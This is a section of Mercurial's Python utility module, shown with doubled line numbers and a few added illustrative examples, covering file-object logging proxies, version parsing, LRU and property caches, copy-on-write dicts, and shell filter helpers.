592 592 r'readable', *args, **kwargs)
593 593
594 594 def readline(self, *args, **kwargs):
595 595 return object.__getattribute__(self, r'_observedcall')(
596 596 r'readline', *args, **kwargs)
597 597
598 598 def readlines(self, *args, **kwargs):
599 599 return object.__getattribute__(self, r'_observedcall')(
600 600 r'readlines', *args, **kwargs)
601 601
602 602 def seek(self, *args, **kwargs):
603 603 return object.__getattribute__(self, r'_observedcall')(
604 604 r'seek', *args, **kwargs)
605 605
606 606 def seekable(self, *args, **kwargs):
607 607 return object.__getattribute__(self, r'_observedcall')(
608 608 r'seekable', *args, **kwargs)
609 609
610 610 def tell(self, *args, **kwargs):
611 611 return object.__getattribute__(self, r'_observedcall')(
612 612 r'tell', *args, **kwargs)
613 613
614 614 def truncate(self, *args, **kwargs):
615 615 return object.__getattribute__(self, r'_observedcall')(
616 616 r'truncate', *args, **kwargs)
617 617
618 618 def writable(self, *args, **kwargs):
619 619 return object.__getattribute__(self, r'_observedcall')(
620 620 r'writable', *args, **kwargs)
621 621
622 622 def writelines(self, *args, **kwargs):
623 623 return object.__getattribute__(self, r'_observedcall')(
624 624 r'writelines', *args, **kwargs)
625 625
626 626 def read(self, *args, **kwargs):
627 627 return object.__getattribute__(self, r'_observedcall')(
628 628 r'read', *args, **kwargs)
629 629
630 630 def readall(self, *args, **kwargs):
631 631 return object.__getattribute__(self, r'_observedcall')(
632 632 r'readall', *args, **kwargs)
633 633
634 634 def readinto(self, *args, **kwargs):
635 635 return object.__getattribute__(self, r'_observedcall')(
636 636 r'readinto', *args, **kwargs)
637 637
638 638 def write(self, *args, **kwargs):
639 639 return object.__getattribute__(self, r'_observedcall')(
640 640 r'write', *args, **kwargs)
641 641
642 642 def detach(self, *args, **kwargs):
643 643 return object.__getattribute__(self, r'_observedcall')(
644 644 r'detach', *args, **kwargs)
645 645
646 646 def read1(self, *args, **kwargs):
647 647 return object.__getattribute__(self, r'_observedcall')(
648 648 r'read1', *args, **kwargs)
649 649
650 650 class observedbufferedinputpipe(bufferedinputpipe):
651 651 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
652 652
653 653 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
654 654 bypass ``fileobjectproxy``. Because of this, we need to make
655 655 ``bufferedinputpipe`` aware of these operations.
656 656
657 657 This variation of ``bufferedinputpipe`` can notify observers about
658 658 ``os.read()`` events. It also re-publishes other events, such as
659 659 ``read()`` and ``readline()``.
660 660 """
661 661 def _fillbuffer(self):
662 662 res = super(observedbufferedinputpipe, self)._fillbuffer()
663 663
664 664 fn = getattr(self._input._observer, r'osread', None)
665 665 if fn:
666 666 fn(res, _chunksize)
667 667
668 668 return res
669 669
670 670 # We use different observer methods because the operation isn't
671 671 # performed on the actual file object but on us.
672 672 def read(self, size):
673 673 res = super(observedbufferedinputpipe, self).read(size)
674 674
675 675 fn = getattr(self._input._observer, r'bufferedread', None)
676 676 if fn:
677 677 fn(res, size)
678 678
679 679 return res
680 680
681 681 def readline(self, *args, **kwargs):
682 682 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
683 683
684 684 fn = getattr(self._input._observer, r'bufferedreadline', None)
685 685 if fn:
686 686 fn(res)
687 687
688 688 return res
689 689
690 690 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
691 691 DATA_ESCAPE_MAP.update({
692 692 b'\\': b'\\\\',
693 693 b'\r': br'\r',
694 694 b'\n': br'\n',
695 695 })
696 696 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
697 697
698 698 def escapedata(s):
699 699 if isinstance(s, bytearray):
700 700 s = bytes(s)
701 701
702 702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
703 703
704 704 class fileobjectobserver(object):
705 705 """Logs file object activity."""
706 706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
707 707 self.fh = fh
708 708 self.name = name
709 709 self.logdata = logdata
710 710 self.reads = reads
711 711 self.writes = writes
712 712
713 713 def _writedata(self, data):
714 714 if not self.logdata:
715 715 self.fh.write('\n')
716 716 return
717 717
718 718 # Simple case writes all data on a single line.
719 719 if b'\n' not in data:
720 720 self.fh.write(': %s\n' % escapedata(data))
721 721 return
722 722
723 723 # Data with newlines is written to multiple lines.
724 724 self.fh.write(':\n')
725 725 lines = data.splitlines(True)
726 726 for line in lines:
727 727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
728 728
729 729 def read(self, res, size=-1):
730 730 if not self.reads:
731 731 return
732 732 # Python 3 can return None from reads at EOF instead of empty strings.
733 733 if res is None:
734 734 res = ''
735 735
736 736 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
737 737 self._writedata(res)
738 738
739 739 def readline(self, res, limit=-1):
740 740 if not self.reads:
741 741 return
742 742
743 743 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
744 744 self._writedata(res)
745 745
746 746 def readinto(self, res, dest):
747 747 if not self.reads:
748 748 return
749 749
750 750 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
751 751 res))
752 752 data = dest[0:res] if res is not None else b''
753 753 self._writedata(data)
754 754
755 755 def write(self, res, data):
756 756 if not self.writes:
757 757 return
758 758
759 759 # Python 2 returns None from some write() calls. Python 3 (reasonably)
760 760 # returns the integer bytes written.
761 761 if res is None and data:
762 762 res = len(data)
763 763
764 764 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
765 765 self._writedata(data)
766 766
767 767 def flush(self, res):
768 768 if not self.writes:
769 769 return
770 770
771 771 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
772 772
773 773 # For observedbufferedinputpipe.
774 774 def bufferedread(self, res, size):
775 775 self.fh.write('%s> bufferedread(%d) -> %d' % (
776 776 self.name, size, len(res)))
777 777 self._writedata(res)
778 778
779 779 def bufferedreadline(self, res):
780 780 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
781 781 self._writedata(res)
782 782
783 783 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
784 784 logdata=False):
785 785 """Turn a file object into a logging file object."""
786 786
787 787 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
788 788 logdata=logdata)
789 789 return fileobjectproxy(fh, observer)
790 790
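# Editor's note: illustrative sketch, not part of the original source.
# The exact log line below assumes the fileobjectobserver formatting
# defined above (and Python 2 bytes/str semantics).
def _example_makeloggingfileobject():
    import io
    log = io.BytesIO()
    fh = makeloggingfileobject(log, io.BytesIO(b'data'), b'src',
                               logdata=True)
    fh.read(2)             # proxied to the real object, then logged
    return log.getvalue()  # -> b'src> read(2) -> 2: da\n'
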
791 791 def version():
792 792 """Return version information if available."""
793 793 try:
794 794 from . import __version__
795 795 return __version__.version
796 796 except ImportError:
797 797 return 'unknown'
798 798
799 799 def versiontuple(v=None, n=4):
800 800 """Parses a Mercurial version string into an N-tuple.
801 801
802 802 The version string to be parsed is specified with the ``v`` argument.
803 803 If it isn't defined, the current Mercurial version string will be parsed.
804 804
805 805 ``n`` can be 2, 3, or 4. Here is how some version strings map to
806 806 returned values:
807 807
808 808 >>> v = b'3.6.1+190-df9b73d2d444'
809 809 >>> versiontuple(v, 2)
810 810 (3, 6)
811 811 >>> versiontuple(v, 3)
812 812 (3, 6, 1)
813 813 >>> versiontuple(v, 4)
814 814 (3, 6, 1, '190-df9b73d2d444')
815 815
816 816 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
817 817 (3, 6, 1, '190-df9b73d2d444+20151118')
818 818
819 819 >>> v = b'3.6'
820 820 >>> versiontuple(v, 2)
821 821 (3, 6)
822 822 >>> versiontuple(v, 3)
823 823 (3, 6, None)
824 824 >>> versiontuple(v, 4)
825 825 (3, 6, None, None)
826 826
827 827 >>> v = b'3.9-rc'
828 828 >>> versiontuple(v, 2)
829 829 (3, 9)
830 830 >>> versiontuple(v, 3)
831 831 (3, 9, None)
832 832 >>> versiontuple(v, 4)
833 833 (3, 9, None, 'rc')
834 834
835 835 >>> v = b'3.9-rc+2-02a8fea4289b'
836 836 >>> versiontuple(v, 2)
837 837 (3, 9)
838 838 >>> versiontuple(v, 3)
839 839 (3, 9, None)
840 840 >>> versiontuple(v, 4)
841 841 (3, 9, None, 'rc+2-02a8fea4289b')
842 842 """
843 843 if not v:
844 844 v = version()
845 845 parts = remod.split('[\+-]', v, 1)
846 846 if len(parts) == 1:
847 847 vparts, extra = parts[0], None
848 848 else:
849 849 vparts, extra = parts
850 850
851 851 vints = []
852 852 for i in vparts.split('.'):
853 853 try:
854 854 vints.append(int(i))
855 855 except ValueError:
856 856 break
857 857 # (3, 6) -> (3, 6, None)
858 858 while len(vints) < 3:
859 859 vints.append(None)
860 860
861 861 if n == 2:
862 862 return (vints[0], vints[1])
863 863 if n == 3:
864 864 return (vints[0], vints[1], vints[2])
865 865 if n == 4:
866 866 return (vints[0], vints[1], vints[2], extra)
867 867
868 868 def cachefunc(func):
869 869 '''cache the result of function calls'''
870 870 # XXX doesn't handle keywords args
871 871 if func.__code__.co_argcount == 0:
872 872 cache = []
873 873 def f():
874 874 if len(cache) == 0:
875 875 cache.append(func())
876 876 return cache[0]
877 877 return f
878 878 cache = {}
879 879 if func.__code__.co_argcount == 1:
880 880 # we gain a small amount of time because
881 881 # we don't need to pack/unpack the list
882 882 def f(arg):
883 883 if arg not in cache:
884 884 cache[arg] = func(arg)
885 885 return cache[arg]
886 886 else:
887 887 def f(*args):
888 888 if args not in cache:
889 889 cache[args] = func(*args)
890 890 return cache[args]
891 891
892 892 return f
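# Editor's note: illustrative sketch, not part of the original source.
# cachefunc doubles as a decorator; the recursive calls below resolve to
# the cached wrapper, so each argument is computed only once.
@cachefunc
def _example_fib(n):
    return n if n < 2 else _example_fib(n - 1) + _example_fib(n - 2)
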
893 893
894 894 class cow(object):
895 895 """helper class to make copy-on-write easier
896 896
897 897 Call preparewrite before doing any writes.
898 898 """
899 899
900 900 def preparewrite(self):
901 901 """call this before writes, return self or a copied new object"""
902 902 if getattr(self, '_copied', 0):
903 903 self._copied -= 1
904 904 return self.__class__(self)
905 905 return self
906 906
907 907 def copy(self):
908 908 """always do a cheap copy"""
909 909 self._copied = getattr(self, '_copied', 0) + 1
910 910 return self
911 911
912 912 class sortdict(collections.OrderedDict):
913 913 '''a simple sorted dictionary
914 914
915 915 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
916 916 >>> d2 = d1.copy()
917 917 >>> d2
918 918 sortdict([('a', 0), ('b', 1)])
919 919 >>> d2.update([(b'a', 2)])
920 920 >>> list(d2.keys()) # should still be in last-set order
921 921 ['b', 'a']
922 922 '''
923 923
924 924 def __setitem__(self, key, value):
925 925 if key in self:
926 926 del self[key]
927 927 super(sortdict, self).__setitem__(key, value)
928 928
929 929 if pycompat.ispypy:
930 930 # __setitem__() isn't called as of PyPy 5.8.0
931 931 def update(self, src):
932 932 if isinstance(src, dict):
933 933 src = src.iteritems()
934 934 for k, v in src:
935 935 self[k] = v
936 936
937 937 class cowdict(cow, dict):
938 938 """copy-on-write dict
939 939
940 940 Be sure to call d = d.preparewrite() before writing to d.
941 941
942 942 >>> a = cowdict()
943 943 >>> a is a.preparewrite()
944 944 True
945 945 >>> b = a.copy()
946 946 >>> b is a
947 947 True
948 948 >>> c = b.copy()
949 949 >>> c is a
950 950 True
951 951 >>> a = a.preparewrite()
952 952 >>> b is a
953 953 False
954 954 >>> a is a.preparewrite()
955 955 True
956 956 >>> c = c.preparewrite()
957 957 >>> b is c
958 958 False
959 959 >>> b is b.preparewrite()
960 960 True
961 961 """
962 962
963 963 class cowsortdict(cow, sortdict):
964 964 """copy-on-write sortdict
965 965
966 966 Be sure to call d = d.preparewrite() before writing to d.
967 967 """
968 968
969 969 class transactional(object):
970 970 """Base class for making a transactional type into a context manager."""
971 971 __metaclass__ = abc.ABCMeta
972 972
973 973 @abc.abstractmethod
974 974 def close(self):
975 975 """Successfully closes the transaction."""
976 976
977 977 @abc.abstractmethod
978 978 def release(self):
979 979 """Marks the end of the transaction.
980 980
981 981 If the transaction has not been closed, it will be aborted.
982 982 """
983 983
984 984 def __enter__(self):
985 985 return self
986 986
987 987 def __exit__(self, exc_type, exc_val, exc_tb):
988 988 try:
989 989 if exc_type is None:
990 990 self.close()
991 991 finally:
992 992 self.release()
993 993
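# Editor's note: illustrative sketch, not part of the original source;
# '_demotxn' is a hypothetical minimal subclass. Used as a context
# manager, close() runs only on success while release() always runs.
class _demotxn(transactional):
    def __init__(self):
        self.closed = False
    def close(self):
        self.closed = True
    def release(self):
        if not self.closed:
            pass  # a real transaction would roll back here
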
994 994 @contextlib.contextmanager
995 995 def acceptintervention(tr=None):
996 996 """A context manager that closes the transaction on InterventionRequired
997 997
998 998     If no transaction was provided, this simply runs the body and returns.
999 999 """
1000 1000 if not tr:
1001 1001 yield
1002 1002 return
1003 1003 try:
1004 1004 yield
1005 1005 tr.close()
1006 1006 except error.InterventionRequired:
1007 1007 tr.close()
1008 1008 raise
1009 1009 finally:
1010 1010 tr.release()
1011 1011
1012 1012 @contextlib.contextmanager
1013 1013 def nullcontextmanager():
1014 1014 yield
1015 1015
1016 1016 class _lrucachenode(object):
1017 1017 """A node in a doubly linked list.
1018 1018
1019 1019 Holds a reference to nodes on either side as well as a key-value
1020 1020 pair for the dictionary entry.
1021 1021 """
1022 1022 __slots__ = (u'next', u'prev', u'key', u'value')
1023 1023
1024 1024 def __init__(self):
1025 1025 self.next = None
1026 1026 self.prev = None
1027 1027
1028 1028 self.key = _notset
1029 1029 self.value = None
1030 1030
1031 1031 def markempty(self):
1032 1032 """Mark the node as emptied."""
1033 1033 self.key = _notset
1034 1034
1035 1035 class lrucachedict(object):
1036 1036 """Dict that caches most recent accesses and sets.
1037 1037
1038 1038 The dict consists of an actual backing dict - indexed by original
1039 1039 key - and a doubly linked circular list defining the order of entries in
1040 1040 the cache.
1041 1041
1042 1042 The head node is the newest entry in the cache. If the cache is full,
1043 1043 we recycle head.prev and make it the new head. Cache accesses result in
1044 1044 the node being moved to before the existing head and being marked as the
1045 1045 new head node.
1046 1046 """
1047 1047 def __init__(self, max):
1048 1048 self._cache = {}
1049 1049
1050 1050 self._head = head = _lrucachenode()
1051 1051 head.prev = head
1052 1052 head.next = head
1053 1053 self._size = 1
1054 1054 self._capacity = max
1055 1055
1056 1056 def __len__(self):
1057 1057 return len(self._cache)
1058 1058
1059 1059 def __contains__(self, k):
1060 1060 return k in self._cache
1061 1061
1062 1062 def __iter__(self):
1063 1063 # We don't have to iterate in cache order, but why not.
1064 1064 n = self._head
1065 1065 for i in range(len(self._cache)):
1066 1066 yield n.key
1067 1067 n = n.next
1068 1068
1069 1069 def __getitem__(self, k):
1070 1070 node = self._cache[k]
1071 1071 self._movetohead(node)
1072 1072 return node.value
1073 1073
1074 1074 def __setitem__(self, k, v):
1075 1075 node = self._cache.get(k)
1076 1076 # Replace existing value and mark as newest.
1077 1077 if node is not None:
1078 1078 node.value = v
1079 1079 self._movetohead(node)
1080 1080 return
1081 1081
1082 1082 if self._size < self._capacity:
1083 1083 node = self._addcapacity()
1084 1084 else:
1085 1085 # Grab the last/oldest item.
1086 1086 node = self._head.prev
1087 1087
1088 1088 # At capacity. Kill the old entry.
1089 1089 if node.key is not _notset:
1090 1090 del self._cache[node.key]
1091 1091
1092 1092 node.key = k
1093 1093 node.value = v
1094 1094 self._cache[k] = node
1095 1095 # And mark it as newest entry. No need to adjust order since it
1096 1096 # is already self._head.prev.
1097 1097 self._head = node
1098 1098
1099 1099 def __delitem__(self, k):
1100 1100 node = self._cache.pop(k)
1101 1101 node.markempty()
1102 1102
1103 1103 # Temporarily mark as newest item before re-adjusting head to make
1104 1104 # this node the oldest item.
1105 1105 self._movetohead(node)
1106 1106 self._head = node.next
1107 1107
1108 1108 # Additional dict methods.
1109 1109
1110 1110 def get(self, k, default=None):
1111 1111 try:
1112 1112 return self._cache[k].value
1113 1113 except KeyError:
1114 1114 return default
1115 1115
1116 1116 def clear(self):
1117 1117 n = self._head
1118 1118 while n.key is not _notset:
1119 1119 n.markempty()
1120 1120 n = n.next
1121 1121
1122 1122 self._cache.clear()
1123 1123
1124 1124 def copy(self):
1125 1125 result = lrucachedict(self._capacity)
1126 1126 n = self._head.prev
1127 1127 # Iterate in oldest-to-newest order, so the copy has the right ordering
1128 1128 for i in range(len(self._cache)):
1129 1129 result[n.key] = n.value
1130 1130 n = n.prev
1131 1131 return result
1132 1132
1133 1133 def _movetohead(self, node):
1134 1134 """Mark a node as the newest, making it the new head.
1135 1135
1136 1136 When a node is accessed, it becomes the freshest entry in the LRU
1137 1137 list, which is denoted by self._head.
1138 1138
1139 1139 Visually, let's make ``N`` the new head node (* denotes head):
1140 1140
1141 1141 previous/oldest <-> head <-> next/next newest
1142 1142
1143 1143 ----<->--- A* ---<->-----
1144 1144 | |
1145 1145 E <-> D <-> N <-> C <-> B
1146 1146
1147 1147 To:
1148 1148
1149 1149 ----<->--- N* ---<->-----
1150 1150 | |
1151 1151 E <-> D <-> C <-> B <-> A
1152 1152
1153 1153 This requires the following moves:
1154 1154
1155 1155 C.next = D (node.prev.next = node.next)
1156 1156 D.prev = C (node.next.prev = node.prev)
1157 1157 E.next = N (head.prev.next = node)
1158 1158 N.prev = E (node.prev = head.prev)
1159 1159 N.next = A (node.next = head)
1160 1160 A.prev = N (head.prev = node)
1161 1161 """
1162 1162 head = self._head
1163 1163 # C.next = D
1164 1164 node.prev.next = node.next
1165 1165 # D.prev = C
1166 1166 node.next.prev = node.prev
1167 1167 # N.prev = E
1168 1168 node.prev = head.prev
1169 1169 # N.next = A
1170 1170         # It is tempting to do just "head" here; however, if node is
1171 1171         # adjacent to head, this will do bad things.
1172 1172 node.next = head.prev.next
1173 1173 # E.next = N
1174 1174 node.next.prev = node
1175 1175 # A.prev = N
1176 1176 node.prev.next = node
1177 1177
1178 1178 self._head = node
1179 1179
1180 1180 def _addcapacity(self):
1181 1181 """Add a node to the circular linked list.
1182 1182
1183 1183 The new node is inserted before the head node.
1184 1184 """
1185 1185 head = self._head
1186 1186 node = _lrucachenode()
1187 1187 head.prev.next = node
1188 1188 node.prev = head.prev
1189 1189 node.next = head
1190 1190 head.prev = node
1191 1191 self._size += 1
1192 1192 return node
1193 1193
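# Editor's note: illustrative sketch, not part of the original source.
# It demonstrates the recycling order described in the class docstring.
def _example_lrucachedict():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']           # touching 'a' makes 'b' the oldest entry
    d['c'] = 3       # at capacity, so 'b' is recycled for 'c'
    return 'b' in d  # -> False
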
1194 1194 def lrucachefunc(func):
1195 1195 '''cache most recent results of function calls'''
1196 1196 cache = {}
1197 1197 order = collections.deque()
1198 1198 if func.__code__.co_argcount == 1:
1199 1199 def f(arg):
1200 1200 if arg not in cache:
1201 1201 if len(cache) > 20:
1202 1202 del cache[order.popleft()]
1203 1203 cache[arg] = func(arg)
1204 1204 else:
1205 1205 order.remove(arg)
1206 1206 order.append(arg)
1207 1207 return cache[arg]
1208 1208 else:
1209 1209 def f(*args):
1210 1210 if args not in cache:
1211 1211 if len(cache) > 20:
1212 1212 del cache[order.popleft()]
1213 1213 cache[args] = func(*args)
1214 1214 else:
1215 1215 order.remove(args)
1216 1216 order.append(args)
1217 1217 return cache[args]
1218 1218
1219 1219 return f
1220 1220
1221 1221 class propertycache(object):
1222 1222 def __init__(self, func):
1223 1223 self.func = func
1224 1224 self.name = func.__name__
1225 1225 def __get__(self, obj, type=None):
1226 1226 result = self.func(obj)
1227 1227 self.cachevalue(obj, result)
1228 1228 return result
1229 1229
1230 1230 def cachevalue(self, obj, value):
1231 1231 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1232 1232 obj.__dict__[self.name] = value
1233 1233
1234 1234 def clearcachedproperty(obj, prop):
1235 1235 '''clear a cached property value, if one has been set'''
1236 1236 if prop in obj.__dict__:
1237 1237 del obj.__dict__[prop]
1238 1238
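# Editor's note: illustrative sketch, not part of the original source;
# the constant stands in for any expensive, effectively-immutable value.
class _example_cached(object):
    @propertycache
    def expensive(self):
        return 42  # computed once, then served from the instance __dict__
# clearcachedproperty(obj, 'expensive') forces recomputation on next access
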
1239 1239 def pipefilter(s, cmd):
1240 1240 '''filter string S through command CMD, returning its output'''
1241 1241 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1242 1242 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1243 1243 pout, perr = p.communicate(s)
1244 1244 return pout
1245 1245
1246 1246 def tempfilter(s, cmd):
1247 1247 '''filter string S through a pair of temporary files with CMD.
1248 1248 CMD is used as a template to create the real command to be run,
1249 1249 with the strings INFILE and OUTFILE replaced by the real names of
1250 1250 the temporary files generated.'''
1251 1251 inname, outname = None, None
1252 1252 try:
1253 1253 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1254 1254 fp = os.fdopen(infd, r'wb')
1255 1255 fp.write(s)
1256 1256 fp.close()
1257 1257 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1258 1258 os.close(outfd)
1259 1259 cmd = cmd.replace('INFILE', inname)
1260 1260 cmd = cmd.replace('OUTFILE', outname)
1261 1261 code = os.system(cmd)
1262 1262 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1263 1263 code = 0
1264 1264 if code:
1265 1265 raise Abort(_("command '%s' failed: %s") %
1266 1266 (cmd, explainexit(code)))
1267 1267 return readfile(outname)
1268 1268 finally:
1269 1269 try:
1270 1270 if inname:
1271 1271 os.unlink(inname)
1272 1272 except OSError:
1273 1273 pass
1274 1274 try:
1275 1275 if outname:
1276 1276 os.unlink(outname)
1277 1277 except OSError:
1278 1278 pass
1279 1279
1280 1280 filtertable = {
1281 1281 'tempfile:': tempfilter,
1282 1282 'pipe:': pipefilter,
1283 1283 }
1284 1284
1285 1285 def filter(s, cmd):
1286 1286 "filter a string through a command that transforms its input to its output"
1287 1287 for name, fn in filtertable.iteritems():
1288 1288 if cmd.startswith(name):
1289 1289 return fn(s, cmd[len(name):].lstrip())
1290 1290 return pipefilter(s, cmd)
1291 1291
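# Editor's note: illustrative sketch, not part of the original source;
# it assumes a POSIX shell with 'tr' available.
def _example_filter():
    return filter(b'abc', b'pipe: tr a-z A-Z')  # -> b'ABC'
# a 'tempfile:' command instead gets INFILE/OUTFILE placeholders filled
# in, e.g. b'tempfile: sort INFILE > OUTFILE'
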
1292 1292 def binary(s):
1293 1293 """return true if a string is binary data"""
1294 1294 return bool(s and '\0' in s)
1295 1295
1296 1296 def increasingchunks(source, min=1024, max=65536):
1297 1297 '''return no less than min bytes per chunk while data remains,
1298 1298 doubling min after each chunk until it reaches max'''
1299 1299 def log2(x):
1300 1300 if not x:
1301 1301 return 0
1302 1302 i = 0
1303 1303 while x:
1304 1304 x >>= 1
1305 1305 i += 1
1306 1306 return i - 1
1307 1307
1308 1308 buf = []
1309 1309 blen = 0
1310 1310 for chunk in source:
1311 1311 buf.append(chunk)
1312 1312 blen += len(chunk)
1313 1313 if blen >= min:
1314 1314 if min < max:
1315 1315 min = min << 1
1316 1316 nmin = 1 << log2(blen)
1317 1317 if nmin > min:
1318 1318 min = nmin
1319 1319 if min > max:
1320 1320 min = max
1321 1321 yield ''.join(buf)
1322 1322 blen = 0
1323 1323 buf = []
1324 1324 if buf:
1325 1325 yield ''.join(buf)
1326 1326
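# Editor's note: illustrative sketch, not part of the original source.
# Ten 500-byte chunks with min=1024, max=4096 coalesce into chunks of
# 1500, 2500 and 1000 bytes: each yield waits for at least 'min' bytes,
# and 'min' doubles after every yield until it reaches 'max'.
def _example_increasingchunks():
    src = (b'x' * 500 for _ in range(10))
    return [len(c) for c in increasingchunks(src, min=1024, max=4096)]
    # -> [1500, 2500, 1000]
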
1327 1327 Abort = error.Abort
1328 1328
1329 1329 def always(fn):
1330 1330 return True
1331 1331
1332 1332 def never(fn):
1333 1333 return False
1334 1334
1335 1335 def nogc(func):
1336 1336 """disable garbage collector
1337 1337
1338 1338 Python's garbage collector triggers a GC each time a certain number of
1339 1339 container objects (the number being defined by gc.get_threshold()) are
1340 1340 allocated even when marked not to be tracked by the collector. Tracking has
1341 1341 no effect on when GCs are triggered, only on what objects the GC looks
1342 1342 into. As a workaround, disable GC while building complex (huge)
1343 1343 containers.
1344 1344
1345 1345     This garbage collector issue has been fixed in 2.7. But it still affects
1346 1346     CPython's performance.
1347 1347 """
1348 1348 def wrapper(*args, **kwargs):
1349 1349 gcenabled = gc.isenabled()
1350 1350 gc.disable()
1351 1351 try:
1352 1352 return func(*args, **kwargs)
1353 1353 finally:
1354 1354 if gcenabled:
1355 1355 gc.enable()
1356 1356 return wrapper
1357 1357
1358 1358 if pycompat.ispypy:
1359 1359 # PyPy runs slower with gc disabled
1360 1360 nogc = lambda x: x
1361 1361
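# Editor's note: illustrative sketch, not part of the original source.
# nogc pays off when a tight loop allocates many container objects.
@nogc
def _example_buildindex(entries):
    return dict((e, i) for i, e in enumerate(entries))
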
1362 1362 def pathto(root, n1, n2):
1363 1363 '''return the relative path from one place to another.
1364 1364 root should use os.sep to separate directories
1365 1365 n1 should use os.sep to separate directories
1366 1366 n2 should use "/" to separate directories
1367 1367 returns an os.sep-separated path.
1368 1368
1369 1369 If n1 is a relative path, it's assumed it's
1370 1370 relative to root.
1371 1371 n2 should always be relative to root.
1372 1372 '''
1373 1373 if not n1:
1374 1374 return localpath(n2)
1375 1375 if os.path.isabs(n1):
1376 1376 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1377 1377 return os.path.join(root, localpath(n2))
1378 1378 n2 = '/'.join((pconvert(root), n2))
1379 1379 a, b = splitpath(n1), n2.split('/')
1380 1380 a.reverse()
1381 1381 b.reverse()
1382 1382 while a and b and a[-1] == b[-1]:
1383 1383 a.pop()
1384 1384 b.pop()
1385 1385 b.reverse()
1386 1386 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1387 1387
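# Editor's note: illustrative sketch, not part of the original source;
# the result assumes a POSIX os.sep of '/'.
def _example_pathto():
    # the shared leading component 'a' is stripped, and one '..' covers
    # the remaining component of n1 ('b')
    return pathto(b'/repo', b'a/b', b'a/c/d')  # -> b'../c/d'
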
1388 1388 def mainfrozen():
1389 1389 """return True if we are a frozen executable.
1390 1390
1391 1391 The code supports py2exe (most common, Windows only) and tools/freeze
1392 1392 (portable, not much used).
1393 1393 """
1394 1394 return (safehasattr(sys, "frozen") or # new py2exe
1395 1395 safehasattr(sys, "importers") or # old py2exe
1396 1396 imp.is_frozen(u"__main__")) # tools/freeze
1397 1397
1398 1398 # the location of data files matching the source code
1399 1399 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1400 1400 # executable version (py2exe) doesn't support __file__
1401 1401 datapath = os.path.dirname(pycompat.sysexecutable)
1402 1402 else:
1403 1403 datapath = os.path.dirname(pycompat.fsencode(__file__))
1404 1404
1405 1405 i18n.setdatapath(datapath)
1406 1406
1407 1407 _hgexecutable = None
1408 1408
1409 1409 def hgexecutable():
1410 1410 """return location of the 'hg' executable.
1411 1411
1412 1412 Defaults to $HG or 'hg' in the search path.
1413 1413 """
1414 1414 if _hgexecutable is None:
1415 1415 hg = encoding.environ.get('HG')
1416 1416 mainmod = sys.modules[r'__main__']
1417 1417 if hg:
1418 1418 _sethgexecutable(hg)
1419 1419 elif mainfrozen():
1420 1420 if getattr(sys, 'frozen', None) == 'macosx_app':
1421 1421 # Env variable set by py2app
1422 1422 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1423 1423 else:
1424 1424 _sethgexecutable(pycompat.sysexecutable)
1425 1425 elif (os.path.basename(
1426 1426 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1427 1427 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1428 1428 else:
1429 1429 exe = findexe('hg') or os.path.basename(sys.argv[0])
1430 1430 _sethgexecutable(exe)
1431 1431 return _hgexecutable
1432 1432
1433 1433 def _sethgexecutable(path):
1434 1434 """set location of the 'hg' executable"""
1435 1435 global _hgexecutable
1436 1436 _hgexecutable = path
1437 1437
1438 1438 def _testfileno(f, stdf):
1439 1439 fileno = getattr(f, 'fileno', None)
1440 1440 try:
1441 1441 return fileno and fileno() == stdf.fileno()
1442 1442 except io.UnsupportedOperation:
1443 1443 return False # fileno() raised UnsupportedOperation
1444 1444
1445 1445 def isstdin(f):
1446 1446 return _testfileno(f, sys.__stdin__)
1447 1447
1448 1448 def isstdout(f):
1449 1449 return _testfileno(f, sys.__stdout__)
1450 1450
1451 1451 def shellenviron(environ=None):
1452 1452 """return environ with optional override, useful for shelling out"""
1453 1453 def py2shell(val):
1454 1454 'convert python object into string that is useful to shell'
1455 1455 if val is None or val is False:
1456 1456 return '0'
1457 1457 if val is True:
1458 1458 return '1'
1459 1459 return pycompat.bytestr(val)
1460 1460 env = dict(encoding.environ)
1461 1461 if environ:
1462 1462 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1463 1463 env['HG'] = hgexecutable()
1464 1464 return env
1465 1465
1466 1466 def system(cmd, environ=None, cwd=None, out=None):
1467 1467 '''enhanced shell command execution.
1468 1468 run with environment maybe modified, maybe in different dir.
1469 1469
1470 1470 if out is specified, it is assumed to be a file-like object that has a
1471 1471 write() method. stdout and stderr will be redirected to out.'''
1472 1472 try:
1473 1473 stdout.flush()
1474 1474 except Exception:
1475 1475 pass
1476 1476 cmd = quotecommand(cmd)
1477 1477 env = shellenviron(environ)
1478 1478 if out is None or isstdout(out):
1479 1479 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1480 1480 env=env, cwd=cwd)
1481 1481 else:
1482 1482 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
